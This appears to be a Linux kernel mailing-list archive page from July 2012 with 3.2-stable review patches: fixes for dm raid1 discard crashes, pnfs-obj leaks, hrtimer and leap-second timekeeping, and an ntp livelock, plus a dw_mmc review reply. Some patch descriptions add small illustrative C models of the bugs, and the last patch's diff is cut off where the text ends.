[ 072/108] dm raid1: fix crash with mirror recovery and discard

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mikulas Patocka 

commit 751f188dd5ab95b3f2b5f2f467c38aae5a2877eb upstream.

This patch fixes a crash when a discard request is sent during mirror
recovery.

Firstly, some background.  Generally, the following sequence happens during
mirror synchronization:
- function do_recovery is called
- do_recovery calls dm_rh_recovery_prepare
- dm_rh_recovery_prepare uses a semaphore to limit the number of
  simultaneously recovered regions (by default the semaphore value is 1,
  so only one region at a time is recovered)
- dm_rh_recovery_prepare calls __rh_recovery_prepare,
  __rh_recovery_prepare asks the log driver for the next region to
  recover. Then, it sets the region state to DM_RH_RECOVERING. If there
  are no pending I/Os on this region, the region is added to
  quiesced_regions list. If there are pending I/Os, the region is not
  added to any list. It is added to the quiesced_regions list later (by
  dm_rh_dec function) when all I/Os finish.
- when the region is on quiesced_regions list, there are no I/Os in
  flight on this region. The region is popped from the list in
  dm_rh_recovery_start function. Then, a kcopyd job is started in the
  recover function.
- when the kcopyd job finishes, recovery_complete is called. It calls
  dm_rh_recovery_end. dm_rh_recovery_end adds the region to
  recovered_regions or failed_recovered_regions list (depending on
  whether the copy operation was successful or not).

The above mechanism assumes that if the region is in DM_RH_RECOVERING
state, no new I/Os are started on this region. When I/O is started,
dm_rh_inc_pending is called, which increases reg->pending count. When
I/O is finished, dm_rh_dec is called. It decreases reg->pending count.
If the count is zero and the region was in DM_RH_RECOVERING state,
dm_rh_dec adds it to the quiesced_regions list.

Consequently, if we call dm_rh_inc_pending/dm_rh_dec while the region is
in DM_RH_RECOVERING state, it could be added to quiesced_regions list
multiple times or it could be added to this list when kcopyd is copying
data (it is assumed that the region is not on any list while kcopyd does
its jobs). This results in memory corruption and crash.

There already exist bypasses for REQ_FLUSH requests: REQ_FLUSH requests
do not belong to any region, so they are always added to the sync list
in do_writes. dm_rh_inc_pending does not increase count for REQ_FLUSH
requests. In mirror_end_io, dm_rh_dec is never called for REQ_FLUSH
requests. These bypasses avoid the crash possibility described above.

These bypasses were improperly implemented for REQ_DISCARD when
the mirror target gained discard support in commit
5fc2ffeabb9ee0fc0e71ff16b49f34f0ed3d05b4 (dm raid1: support discard).

In do_writes, REQ_DISCARD requests are always added to the sync queue and
immediately dispatched (even if the region is in DM_RH_RECOVERING).  However,
dm_rh_inc and dm_rh_dec are called for REQ_DISCARD requests.  This violates the
rule that no I/Os are started on DM_RH_RECOVERING regions, and causes the list
corruption described above.

This patch changes it so that REQ_DISCARD requests follow the same path
as REQ_FLUSH. This avoids the crash.
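
The accounting problem described above can be sketched as a small user-space model. This is only an illustration under stated assumptions: the `toy_*` names are hypothetical, the region is reduced to a state, a pending counter and a count of how often it was queued, and none of this is the kernel's actual data structure.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of one region; names follow the description, not the kernel structs. */
enum toy_state { TOY_CLEAN, TOY_RECOVERING };
enum toy_req { TOY_WRITE, TOY_FLUSH, TOY_DISCARD };

struct toy_region {
	enum toy_state state;
	int pending;		/* models reg->pending */
	int quiesced_adds;	/* times the region was put on quiesced_regions */
};

/* Flushes always bypass region accounting; discards only with the fix. */
static bool toy_bypasses_region(enum toy_req req, bool discard_bypass)
{
	return req == TOY_FLUSH || (discard_bypass && req == TOY_DISCARD);
}

/* Models dm_rh_inc_pending for a single bio. */
static void toy_inc_pending(struct toy_region *reg, enum toy_req req,
			    bool discard_bypass)
{
	if (toy_bypasses_region(req, discard_bypass))
		return;
	reg->pending++;
}

/* Models the dm_rh_dec call made at I/O completion. */
static void toy_end_io(struct toy_region *reg, enum toy_req req,
		       bool discard_bypass)
{
	if (toy_bypasses_region(req, discard_bypass))
		return;
	assert(reg->pending > 0);
	if (--reg->pending == 0 && reg->state == TOY_RECOVERING)
		reg->quiesced_adds++;
}

/*
 * Recovery starts on an idle region (queued once), then a discard is
 * dispatched and completes. Returns how often the region was queued.
 */
static int toy_discard_during_recovery(bool discard_bypass)
{
	struct toy_region reg = { TOY_CLEAN, 0, 0 };

	reg.state = TOY_RECOVERING;
	if (reg.pending == 0)
		reg.quiesced_adds++;	/* idle region is queued immediately */

	toy_inc_pending(&reg, TOY_DISCARD, discard_bypass);
	toy_end_io(&reg, TOY_DISCARD, discard_bypass);
	return reg.quiesced_adds;
}
```

Without the bypass the model queues the region twice, which corresponds to the double list insertion described above; with the bypass it is queued exactly once.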

Reference: https://bugzilla.redhat.com/837607

Signed-off-by: Mikulas Patocka 
Signed-off-by: Alasdair G Kergon 
Signed-off-by: Ben Hutchings 
---
 drivers/md/dm-raid1.c       |    2 +-
 drivers/md/dm-region-hash.c |    5 ++++-
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
index d039de8..ea16984 100644
--- a/drivers/md/dm-raid1.c
+++ b/drivers/md/dm-raid1.c
@@ -1214,7 +1214,7 @@ static int mirror_end_io(struct dm_target *ti, struct bio *bio,
 	 * We need to dec pending if this was a write.
 	 */
 	if (rw == WRITE) {
-		if (!(bio->bi_rw & REQ_FLUSH))
+		if (!(bio->bi_rw & (REQ_FLUSH | REQ_DISCARD)))
 			dm_rh_dec(ms->rh, map_context->ll);
 		return error;
 	}
diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
index 7771ed2..69732e0 100644
--- a/drivers/md/dm-region-hash.c
+++ b/drivers/md/dm-region-hash.c
@@ -404,6 +404,9 @@ void dm_rh_mark_nosync(struct dm_region_hash *rh, struct bio *bio)
 		return;
 	}
 
+	if (bio->bi_rw & REQ_DISCARD)
+		return;
+
 	/* We must inform the log that the sync count has changed. */
 	log->type->set_region_sync(log, region, 0);
 
@@ -524,7 +527,7 @@ void dm_rh_inc_pending(struct dm_region_hash *rh, struct bio_list *bios)
 	struct bio *bio;
 
 	for (bio = bios->head; bio; bio = bio->bi_next) {
-		if (bio->bi_rw & REQ_FLUSH)
+		if (bio->bi_rw & (REQ_FLUSH | REQ_DISCARD))
 			continue;
 		rh_inc(rh, dm_rh_bio_to_region(rh, bio));
 	}



Re: [PATCH v3 0/6] mmc: dw_mmc: add support for device tree based instantiation

2012-07-22 Thread Jaehoon Chung
On 07/20/2012 07:47 AM, Kukjin Kim wrote:
> Thomas Abraham wrote:
>>
>> On 19 July 2012 20:58, Jaehoon Chung  wrote:
>>> Hi Thomas,
>>>
>>> I think it is not good to add the Samsung-specific code to dw_mmc-pltfm.c.
>>> How about separating it into dw-mmc-exynos.c?
>>
>> I am not sure about this. The only Samsung-specific code in the
>> dw_mmc-pltfm.c file is the data for the of_device_id instances. The clock
>> lookup added to this file in the 3rd patch does not cause any harm
>> on non-Samsung SoCs, which might not define those clocks (on clock
>> lookup failure, only warnings are printed; the driver's probe
>> does not fail).
>>
> I agree with Thomas' opinion, in addition, the dw_mmc-pltfm.c file can
> support that, so adding dw-mmc-exynos.c is not needed now.
> 
>> I would prefer not to add a separate file for Exynos SoCs for now.
>> Splitting into different files will require defining new callbacks,
>> which I feel is not really required.
Then where is the callback function located?

Best Regards,
Jaehoon Chung
>>
> Yes.
> 
> Thanks.
> 
> Best regards,
> Kgene.
> --
> Kukjin Kim , Senior Engineer,
> SW Solution Development Team, Samsung Electronics Co., Ltd.
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-mmc" in
> the body of a message to majord...@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 070/108] pnfs-obj: dont leak objio_state if ore_write/read fails

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit 9909d45a8557455ca5f8ee7af0f253debc851f1a upstream.

[Bug since 3.2 Kernel]
Signed-off-by: Boaz Harrosh 
Signed-off-by: Ben Hutchings 
---
 fs/nfs/objlayout/objio_osd.c |    9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/fs/nfs/objlayout/objio_osd.c b/fs/nfs/objlayout/objio_osd.c
index b47277b..86d7595 100644
--- a/fs/nfs/objlayout/objio_osd.c
+++ b/fs/nfs/objlayout/objio_osd.c
@@ -454,7 +454,10 @@ int objio_read_pagelist(struct nfs_read_data *rdata)
 	objios->ios->done = _read_done;
 	dprintk("%s: offset=0x%llx length=0x%x\n", __func__,
 		rdata->args.offset, rdata->args.count);
-	return ore_read(objios->ios);
+	ret = ore_read(objios->ios);
+	if (unlikely(ret))
+		objio_free_result(&objios->oir);
+	return ret;
 }
 
 /*
@@ -539,8 +542,10 @@ int objio_write_pagelist(struct nfs_write_data *wdata, int how)
 	dprintk("%s: offset=0x%llx length=0x%x\n", __func__,
 		wdata->args.offset, wdata->args.count);
 	ret = ore_write(objios->ios);
-	if (unlikely(ret))
+	if (unlikely(ret)) {
+		objio_free_result(&objios->oir);
 		return ret;
+	}
 
 	if (objios->sync)
 		_write_done(objios->ios, objios);




[ 078/108] hrtimer: Provide clock_was_set_delayed()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

commit f55a6faa384304c89cfef162768e88374d3312cb upstream.

clock_was_set() cannot be called from hard interrupt context because
it calls on_each_cpu().

For fixing the widely reported leap seconds issue it is necessary to
call it from hard interrupt context, i.e. the timer tick code, which
does the timekeeping updates.

Provide a new function which denotes it in the hrtimer cpu base
structure of the cpu on which it is called and raise the hrtimer
softirq. We then execute the clock_was_set() notification from
softirq context in run_hrtimer_softirq(). The hrtimer softirq is
rarely used, so polling the flag there is not a performance issue.
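
The deferral pattern described here can be sketched in user space as follows. This is a minimal model, not the kernel code: `toy_cpu_base` and the `toy_*` functions are hypothetical stand-ins, and the counter merely represents a call to clock_was_set().

```c
#include <stdbool.h>

/* Toy per-CPU state; field names loosely follow the description above. */
struct toy_cpu_base {
	unsigned int clock_was_set;	/* set in hard irq, consumed in softirq */
	bool softirq_raised;		/* models a raised HRTIMER_SOFTIRQ */
	int notifications;		/* how often the real notification ran */
};

/* Hard-irq side: cheap, only records that work is needed. */
static void toy_clock_was_set_delayed(struct toy_cpu_base *base)
{
	base->clock_was_set = 1;
	base->softirq_raised = true;
}

/* Softirq side: polls the flag and runs the deferred notification once. */
static void toy_run_softirq(struct toy_cpu_base *base)
{
	base->softirq_raised = false;
	if (base->clock_was_set) {
		base->clock_was_set = 0;
		base->notifications++;	/* stands in for clock_was_set() */
	}
}

/* Two requests arrive before the softirq runs; the softirq then runs twice. */
static int toy_deferred_notifications(void)
{
	struct toy_cpu_base base = { 0, false, 0 };

	toy_clock_was_set_delayed(&base);
	toy_clock_was_set_delayed(&base);
	toy_run_softirq(&base);
	toy_run_softirq(&base);		/* flag already cleared: no-op */
	return base.notifications;
}
```

Because the flag is a plain boolean, several requests raised before the softirq runs collapse into a single notification, which is sufficient here since the notification only needs to happen at least once after the clock changed.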

[ tglx: Made it depend on CONFIG_HIGH_RES_TIMERS. We really should get
  rid of all this ifdeffery ASAP ]

Signed-off-by: John Stultz 
Reported-by: Jan Engelhardt 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: http://lkml.kernel.org/r/1341960205-56738-2-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Signed-off-by: Ben Hutchings 
---
 include/linux/hrtimer.h |    9 ++++++++-
 kernel/hrtimer.c        |   20 ++++++++++++++++++++
 2 files changed, 28 insertions(+), 1 deletion(-)

diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
index fd0dc30..c9ec940 100644
--- a/include/linux/hrtimer.h
+++ b/include/linux/hrtimer.h
@@ -165,6 +165,7 @@ enum  hrtimer_base_type {
  * @lock:		lock protecting the base and associated clock bases
  *			and timers
  * @active_bases:	Bitfield to mark bases with active timers
+ * @clock_was_set:	Indicates that clock was set from irq context.
  * @expires_next:	absolute time of the next event which was scheduled
  *			via clock_set_next_event()
  * @hres_active:	State of high resolution mode
@@ -177,7 +178,8 @@ enum  hrtimer_base_type {
  */
 struct hrtimer_cpu_base {
 	raw_spinlock_t			lock;
-	unsigned long			active_bases;
+	unsigned int			active_bases;
+	unsigned int			clock_was_set;
 #ifdef CONFIG_HIGH_RES_TIMERS
 	ktime_t				expires_next;
 	int				hres_active;
@@ -286,6 +288,8 @@ extern void hrtimer_peek_ahead_timers(void);
 # define MONOTONIC_RES_NSEC	HIGH_RES_NSEC
 # define KTIME_MONOTONIC_RES	KTIME_HIGH_RES
 
+extern void clock_was_set_delayed(void);
+
 #else
 
 # define MONOTONIC_RES_NSEC	LOW_RES_NSEC
@@ -306,6 +310,9 @@ static inline int hrtimer_is_hres_active(struct hrtimer *timer)
 {
 	return 0;
 }
+
+static inline void clock_was_set_delayed(void) { }
+
 #endif
 
 extern void clock_was_set(void);
diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
index ae34bf5..3c24fb2 100644
--- a/kernel/hrtimer.c
+++ b/kernel/hrtimer.c
@@ -717,6 +717,19 @@ static int hrtimer_switch_to_hres(void)
 	return 1;
 }
 
+/*
+ * Called from timekeeping code to reprogramm the hrtimer interrupt
+ * device. If called from the timer interrupt context we defer it to
+ * softirq context.
+ */
+void clock_was_set_delayed(void)
+{
+	struct hrtimer_cpu_base *cpu_base = &__get_cpu_var(hrtimer_bases);
+
+	cpu_base->clock_was_set = 1;
+	__raise_softirq_irqoff(HRTIMER_SOFTIRQ);
+}
+
 #else
 
 static inline int hrtimer_hres_active(void) { return 0; }
@@ -1395,6 +1408,13 @@ void hrtimer_peek_ahead_timers(void)
 
 static void run_hrtimer_softirq(struct softirq_action *h)
 {
+	struct hrtimer_cpu_base *cpu_base = &__get_cpu_var(hrtimer_bases);
+
+	if (cpu_base->clock_was_set) {
+		cpu_base->clock_was_set = 0;
+		clock_was_set();
+	}
+
 	hrtimer_peek_ahead_timers();
 }
 




[ 079/108] timekeeping: Fix leapsecond triggered load spike issue

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of 4873fa070ae84a4115f0b3c9dfabc224f1bc7c51

The timekeeping code misses an update of the hrtimer subsystem after a
leap second happened. Due to that timers based on CLOCK_REALTIME are
either expiring a second early or late depending on whether a leap
second has been inserted or deleted until an operation is initiated
which causes that update. Unless the update happens by some other
means this discrepancy between the timekeeping and the hrtimer data
stays forever and timers are expired either early or late.

The reported immediate workaround - $ date -s "`date`" - is causing a
call to clock_was_set() which updates the hrtimer data structures.
See: http://www.sheeri.com/content/mysql-and-leap-second-high-cpu-and-fix

Add the missing clock_was_set() call to update_wall_time() in case of
a leap second event. The actual update is deferred to softirq context
as the necessary smp function call cannot be invoked from hard
interrupt context.
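
The one-second discrepancy can be illustrated with a small model. The sketch below assumes, for illustration only, that the hrtimer side caches an offset with realtime = monotonic + offset and that this cache is refreshed only by the clock_was_set() notification; the `toy_*` names and the starting values are hypothetical.

```c
/* Toy clock state, in whole seconds only. */
struct toy_clock {
	long xtime_sec;		/* wall clock */
	long wall_to_mono_sec;	/* monotonic = wall + wall_to_mono */
	long hrtimer_offs_real;	/* cached by hrtimers: realtime = mono + offs */
};

/* Applies a leap second the way the hunks in this patch adjust the clock. */
static void toy_apply_leap(struct toy_clock *c, int leap, int notify)
{
	c->xtime_sec += leap;
	c->wall_to_mono_sec -= leap;
	if (leap && notify)	/* effect of the (deferred) clock_was_set() */
		c->hrtimer_offs_real = -c->wall_to_mono_sec;
}

/*
 * Error in seconds of the moment a CLOCK_REALTIME timer fires:
 * negative means too early, positive means too late.
 */
static long toy_realtime_timer_error(const struct toy_clock *c)
{
	long true_offs = -c->wall_to_mono_sec;

	return true_offs - c->hrtimer_offs_real;
}

/* leap is -1 for an inserted second and +1 for a deleted one. */
static long toy_error_after_leap(int leap, int notify)
{
	struct toy_clock c = { 1000, -900, 900 };

	toy_apply_leap(&c, leap, notify);
	return toy_realtime_timer_error(&c);
}
```

In this model an inserted leap second without the notification leaves realtime timers firing one second early, a deleted one leaves them one second late, and the notification brings the error back to zero.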

Signed-off-by: John Stultz 
Reported-by: Jan Engelhardt 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: http://lkml.kernel.org/r/1341960205-56738-3-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |    4 ++++
 1 file changed, 4 insertions(+)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 5d55185..8958ad7 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -941,6 +941,8 @@ static cycle_t logarithmic_accumulation(cycle_t offset, int shift)
 		leap = second_overflow(xtime.tv_sec);
 		xtime.tv_sec += leap;
 		wall_to_monotonic.tv_sec -= leap;
+		if (leap)
+			clock_was_set_delayed();
 	}
 
 	/* Accumulate raw time */
@@ -1052,6 +1054,8 @@ static void update_wall_time(void)
 		leap = second_overflow(xtime.tv_sec);
 		xtime.tv_sec += leap;
 		wall_to_monotonic.tv_sec -= leap;
+		if (leap)
+			clock_was_set_delayed();
 	}
 
 	timekeeping_update(false);




[ 084/108] timekeeping: Add missing update call in timekeeping_resume()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Gleixner 

This is a backport of 3e997130bd2e8c6f5aaa49d6e3161d4d29b43ab0

The leap second rework unearthed another issue of inconsistent data.

On timekeeping_resume() the timekeeper data is updated, but nothing
calls timekeeping_update(), so now the update code in the timer
interrupt sees stale values.

This has been the case before those changes, but then the timer
interrupt was using stale data as well so this went unnoticed for quite
some time.

Add the missing update call, so all the data is consistent everywhere.

Reported-by: Andreas Schwab 
Reported-and-tested-by: "Rafael J. Wysocki" 
Reported-and-tested-by: Martin Steigerwald 
Cc: LKML 
Cc: Linux PM list 
Cc: John Stultz 
Cc: Ingo Molnar 
Cc: Peter Zijlstra
Cc: Prarit Bhargava 
Signed-off-by: Thomas Gleixner 
Signed-off-by: John Stultz 
Signed-off-by: Linus Torvalds 
[John Stultz: Backported to 3.2]
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |    1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 4938c5e..03e67d4 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -699,6 +699,7 @@ static void timekeeping_resume(void)
 	timekeeper.clock->cycle_last = timekeeper.clock->read(timekeeper.clock);
 	timekeeper.ntp_error = 0;
 	timekeeping_suspended = 0;
+	timekeeping_update(false);
 	write_sequnlock_irqrestore(&xtime_lock, flags);
 
 	touch_softlockup_watchdog();




[ 069/108] ore: Remove support of partial IO request (NFS crash)

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit 62b62ad873f2accad9222a4d7ffbe1e93f6714c1 upstream.

Due to OOM situations the ore might fail to allocate all resources
needed for IO of the full request. If some progress was possible
it would proceed with a partial/short request, for the sake of
forward progress.

Since this crashes NFS-core and exofs is just fine without it just
remove this contraption, and fail.
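
The behavioural change can be sketched as two small functions. This is an illustration under assumptions: `remaining` stands for the part of the request that could not be prepared (the `length` variable in the hunk below), and the `toy_*` names and byte counts are hypothetical.

```c
#include <errno.h>

/* Old behaviour: on a partial failure, shorten the request and report success. */
static int toy_old_result(int ret, unsigned long remaining,
			  unsigned long *ios_length)
{
	if (ret) {
		if (remaining == *ios_length)
			return ret;		/* nothing was prepared at all */
		*ios_length -= remaining;	/* carry on with a short request */
	}
	return 0;
}

/* New behaviour: any failure is reported to the caller unchanged. */
static int toy_new_result(int ret)
{
	return ret;
}

/* An 8192-byte request where only the first 4096 bytes could be prepared. */
static unsigned long toy_old_length_after_partial_failure(void)
{
	unsigned long ios_length = 8192;
	int ret = toy_old_result(-ENOMEM, 4096, &ios_length);

	return ret == 0 ? ios_length : 0;
}
```

With the old logic the caller sees success and a silently shortened request; with the new logic the same situation surfaces as -ENOMEM.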

TODO:
Support real forward progress with some reserved allocations
of resources, such as mem pools and/or bio_sets

[Bug since 3.2 Kernel]
CC: Benny Halevy 
Signed-off-by: Boaz Harrosh 
Signed-off-by: Ben Hutchings 
---
 fs/exofs/ore.c |    8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/fs/exofs/ore.c b/fs/exofs/ore.c
index 49cf230..24a49d4 100644
--- a/fs/exofs/ore.c
+++ b/fs/exofs/ore.c
@@ -735,13 +735,7 @@ static int _prepare_for_striping(struct ore_io_state *ios)
 out:
 	ios->numdevs = devs_in_group;
 	ios->pages_consumed = cur_pg;
-	if (unlikely(ret)) {
-		if (length == ios->length)
-			return ret;
-		else
-			ios->length -= length;
-	}
-	return 0;
+	return ret;
 }
 
 int ore_create(struct ore_io_state *ios)




[ 071/108] pnfs-obj: Fix __r4w_get_page when offset is beyond i_size

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Boaz Harrosh 

commit c999ff68029ebd0f56ccae75444f640f6d5a27d2 upstream.

It is very common for the end of the file to be unaligned on
stripe size. But since we know it's beyond the file's end,
the XOR should be performed with all zeros.

Old code used to just read zeros out of the OSD devices, which is a great
waste. But what scares me more about this situation is that we now have
pages attached to the file's mapping that are beyond i_size. I don't
like the kind of bugs this calls for.

Fix both problems by returning a global zero_page if the offset is beyond
i_size.
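
A rough user-space sketch of the idea follows. It is not the pnfs-obj code: `toy_page`, the single cached page and the reference counter are hypothetical simplifications that only show why the shared zero page must be handed out without taking a reference and must be skipped on release.

```c
#include <stdbool.h>

struct toy_page { int refcount; };

static struct toy_page toy_zero_page;	/* shared, all zeros, never released */
static struct toy_page toy_cached_page;	/* stands in for a page-cache page */

/* Returns the shared zero page for offsets at or beyond the file size. */
static struct toy_page *toy_get_page(long long offset, long long i_size,
				     bool *uptodate)
{
	if (offset >= i_size) {
		*uptodate = true;	/* zeros need no read from the device */
		return &toy_zero_page;
	}
	/* In-range pages: take a reference; *uptodate is left to the caller. */
	toy_cached_page.refcount++;
	return &toy_cached_page;
}

/* Releases a page, but never drops a reference on the shared zero page. */
static void toy_put_page(struct toy_page *page)
{
	if (page != &toy_zero_page)
		page->refcount--;
}

/* Get and put a page beyond i_size; the zero page's count must stay at 0. */
static int toy_zero_page_roundtrip(void)
{
	bool uptodate = false;
	struct toy_page *page = toy_get_page(8192, 5000, &uptodate);

	toy_put_page(page);
	return (page == &toy_zero_page && uptodate) ? toy_zero_page.refcount : -1;
}

/* Get and put an in-range page; its reference count must return to 0. */
static int toy_cached_page_roundtrip(void)
{
	bool uptodate = false;
	struct toy_page *page = toy_get_page(0, 5000, &uptodate);

	toy_put_page(page);
	return page == &toy_cached_page ? toy_cached_page.refcount : -1;
}
```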

TODO:
Change the API to ->__r4w_get_page() so a NULL can be
returned without being considered as error, since XOR API
treats NULL entries as zero_pages.

[Bug since 3.2. Should apply the same way to all Kernels since]
Signed-off-by: Boaz Harrosh 
[bwh: Backported to 3.2: adjust for lack of wdata->header]
Signed-off-by: Ben Hutchings 
---
--- a/fs/nfs/objlayout/objio_osd.c
+++ b/fs/nfs/objlayout/objio_osd.c
@@ -467,8 +467,16 @@ static struct page *__r4w_get_page(void
 	struct objio_state *objios = priv;
 	struct nfs_write_data *wdata = objios->oir.rpcdata;
 	pgoff_t index = offset / PAGE_SIZE;
-	struct page *page = find_get_page(wdata->inode->i_mapping, index);
+	struct page *page;
+	loff_t i_size = i_size_read(wdata->inode);
 
+	if (offset >= i_size) {
+		*uptodate = true;
+		dprintk("%s: g_zero_page index=0x%lx\n", __func__, index);
+		return ZERO_PAGE(0);
+	}
+
+	page = find_get_page(wdata->inode->i_mapping, index);
 	if (!page) {
 		page = find_or_create_page(wdata->inode->i_mapping,
 						index, GFP_NOFS);
@@ -489,8 +497,10 @@ static struct page *__r4w_get_page(void
 
 static void __r4w_put_page(void *priv, struct page *page)
 {
-	dprintk("%s: index=0x%lx\n", __func__, page->index);
-	page_cache_release(page);
+	dprintk("%s: index=0x%lx\n", __func__,
+		(page == ZERO_PAGE(0)) ? -1UL : page->index);
+	if (ZERO_PAGE(0) != page)
+		page_cache_release(page);
 	return;
 }
 




[ 074/108] ntp: Fix leap-second hrtimer livelock

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

This is a backport of 6b43ae8a619d17c4935c3320d2ef9e92bdeed05d

This should have been backported when it was committed, but I
mistook the problem as requiring the ntp_lock changes
that landed in 3.4 in order for it to occur.

Unfortunately the same issue can happen (with only one cpu)
as follows:
do_adjtimex()
 write_seqlock_irq(&xtime_lock);
  process_adjtimex_modes()
   process_adj_status()
    ntp_start_leap_timer()
     hrtimer_start()
      hrtimer_reprogram()
       tick_program_event()
        clockevents_program_event()
         ktime_get()
          seq = read_seqbegin(xtime_lock); [DEADLOCK]

This deadlock will not always occur, as it requires the
leap_timer to force a hrtimer_reprogram, which only happens
if it's set and there's no sooner timer to expire.
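
Why the nested read can never succeed on a single CPU can be shown with a toy sequence lock. This is a sketch under assumptions: the `toy_*` functions are hypothetical, there is no real locking or concurrency, and the reader's retry loop is bounded so that the example terminates instead of spinning forever.

```c
#include <stdbool.h>

/* Toy sequence lock: the counter is odd while a writer holds the lock. */
struct toy_seqlock { unsigned int sequence; };

static void toy_write_seqlock(struct toy_seqlock *sl)   { sl->sequence++; }
static void toy_write_sequnlock(struct toy_seqlock *sl) { sl->sequence++; }

/*
 * Bounded model of a reader's entry: retry while a write is in progress.
 * Returns true once a stable (even) sequence has been sampled.
 */
static bool toy_read_seqbegin_bounded(const struct toy_seqlock *sl,
				      int max_spins, unsigned int *seq)
{
	for (int i = 0; i < max_spins; i++) {
		unsigned int s = sl->sequence;

		if (!(s & 1)) {
			*seq = s;
			return true;
		}
		/* a real reader would relax the CPU and retry here */
	}
	return false;
}

/* The same context takes the write side and then tries to read. */
static bool toy_nested_read_succeeds(void)
{
	struct toy_seqlock sl = { 0 };
	unsigned int seq = 0;
	bool ok;

	toy_write_seqlock(&sl);
	ok = toy_read_seqbegin_bounded(&sl, 1000, &seq);
	toy_write_sequnlock(&sl);
	return ok;
}

/* A read after the writer has finished completes immediately. */
static bool toy_plain_read_succeeds(void)
{
	struct toy_seqlock sl = { 0 };
	unsigned int seq = 0;

	toy_write_seqlock(&sl);
	toy_write_sequnlock(&sl);
	return toy_read_seqbegin_bounded(&sl, 1000, &seq);
}
```

In the model the nested read gives up after its spin budget; in the call chain above there is no budget, and the writer that would make the sequence even again is the very context that is spinning.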

NOTE: This patch, being faithful to the original commit,
introduces a bug (we don't update wall_to_monotonic),
which will be resolved by backporting a following fix.

Original commit message below:

Since commit 7dffa3c673fbcf835cd7be80bb4aec8ad3f51168 the ntp
subsystem has used an hrtimer for triggering the leapsecond
adjustment. However, this can cause a potential livelock.

Thomas diagnosed this as the following pattern:
CPU 0                                  CPU 1
do_adjtimex()
  spin_lock_irq(&ntp_lock);
    process_adjtimex_modes();          timer_interrupt()
      process_adj_status();              do_timer()
        ntp_start_leap_timer();            write_lock(&xtime_lock);
          hrtimer_start();                 update_wall_time();
            hrtimer_reprogram();             ntp_tick_length()
              tick_program_event()             spin_lock(&ntp_lock);
                clockevents_program_event()
                  ktime_get()
                    seq = read_seqbegin(xtime_lock);

This patch tries to avoid the problem by reverting back to not using
an hrtimer to inject leapseconds, and instead we handle the leapsecond
processing in the second_overflow() function.

The downside to this change is that on systems that support highres
timers, the leap second processing will occur on a HZ tick boundary,
(ie: ~1-10ms, depending on HZ)  after the leap second instead of
possibly sooner (~34us in my tests w/ x86_64 lapic).

This patch applies on top of tip/timers/core.

CC: Sasha Levin 
CC: Thomas Gleixner 
Reported-by: Sasha Levin 
Diagnosed-by: Thomas Gleixner
Tested-by: Sasha Levin 
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 include/linux/timex.h |2 +-
 kernel/time/ntp.c |  122 +++--
 kernel/time/timekeeping.c |   18 +++
 3 files changed, 48 insertions(+), 94 deletions(-)

diff --git a/include/linux/timex.h b/include/linux/timex.h
index aa60fe7..08e90fb 100644
--- a/include/linux/timex.h
+++ b/include/linux/timex.h
@@ -266,7 +266,7 @@ static inline int ntp_synced(void)
 /* Returns how long ticks are at present, in ns / 2^NTP_SCALE_SHIFT. */
 extern u64 tick_length;
 
-extern void second_overflow(void);
+extern int second_overflow(unsigned long secs);
 extern void update_ntp_one_tick(void);
 extern int do_adjtimex(struct timex *);
 extern void hardpps(const struct timespec *, const struct timespec *);
diff --git a/kernel/time/ntp.c b/kernel/time/ntp.c
index 4b85a7a..4508f7f 100644
--- a/kernel/time/ntp.c
+++ b/kernel/time/ntp.c
@@ -31,8 +31,6 @@ unsigned long tick_nsec;
 u64				tick_length;
 static u64			tick_length_base;
 
-static struct hrtimer		leap_timer;
-
 #define MAX_TICKADJ		500LL		/* usecs */
 #define MAX_TICKADJ_SCALED \
 	(((MAX_TICKADJ * NSEC_PER_USEC) << NTP_SCALE_SHIFT) / NTP_INTERVAL_FREQ)
@@ -350,60 +348,60 @@ void ntp_clear(void)
 }
